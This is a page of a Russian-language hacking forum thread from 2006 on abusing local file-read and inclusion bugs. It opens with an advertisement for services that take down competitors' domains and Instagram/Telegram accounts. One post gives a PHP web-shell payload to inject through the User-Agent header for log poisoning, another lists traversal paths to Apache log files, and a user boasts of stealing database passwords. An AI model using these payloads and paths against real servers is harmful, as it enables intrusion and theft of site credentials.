УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Что и как можно поднять с читалки файлов.

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

28.08.2006, 05:15

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Просматривая конфиг в php инклдуде не забываем что файл конфига исполяеться...

#12

29.08.2006, 00:12

Muha

Познающий

Регистрация: 21.08.2006

Сообщений: 70

Провел на форуме:
424011

Репутация: 4

Отправить сообщение для Muha с помощью ICQ

Хорошая статья. Я так раздобыл пароли к бд на одном Wap-Сайте

#13

31.08.2006, 21:09

~~васёк~~

Banned

Регистрация: 25.08.2006

Сообщений: 30

Провел на форуме:
31512

Репутация: -12

очень хорошая статья!!!я много нового узнал,большое спасибо!!!

#14

10.09.2006, 01:19

DaemoniZ

Познающий

Регистрация: 09.01.2006

Сообщений: 53

Провел на форуме:
285050

Репутация: 16

izvenyaus`, chto tranlistom.

Statya ne ploha. Daje ochen` ne ploha. a oformlenie... vajna infa ili krasota? chitat` mojno i ladno

#15

05.10.2006, 01:33

pop_korn

Участник форума

Регистрация: 13.09.2005

Сообщений: 170

Провел на форуме:
483324

Репутация: 92

Цитата:

Сообщение от TANZWUT
1ten0.0net1, про access.log не забывай.. UserAgent

# CustomLog "|/usr/sbin/rotatelogs /home/logs/httpd/*/*-access_log 86400" combined ===> логи доступа

По-моему, я не забыл. Или я что-то путаю?

наверное он имел ввиду, что можно получить шелл с помощь access_log, тоесть коннектимся telnet'ом на 80 порт и передаем в запросе в качестве UserAgent:
<?php system($_GET['i']); ?>
затем с помощью этой баги инклудим access_log и получаем веб шелл

Во-во...

#16

12.11.2006, 01:27

MyPoorBrain

Новичок

Регистрация: 09.11.2006

Сообщений: 5

Провел на форуме:
9581

Репутация: 1

Во-во...

Скажите, как отправить запрос к серваку, чтоб он оставил строку в логе? Вот тут бычно лежат логи

../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log

Как послать запрос? И что делать если telnet не коннектится?! Дайте совет!

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Хакеры и кракеры или "Что такое хорошо и что такое плохо?"	foreva	Чужие Статьи	12	09.02.2008 12:26
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал	Дрэгги	Болталка	21	22.07.2007 12:33
Небольшой отрывок от книги	T-REX	Болталка	0	19.10.2004 05:19
Что ломать?	Almight	Чаты	3	09.02.2004 18:48
МнеВеликие перцы	svans	Чаты	11	24.12.2002 18:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход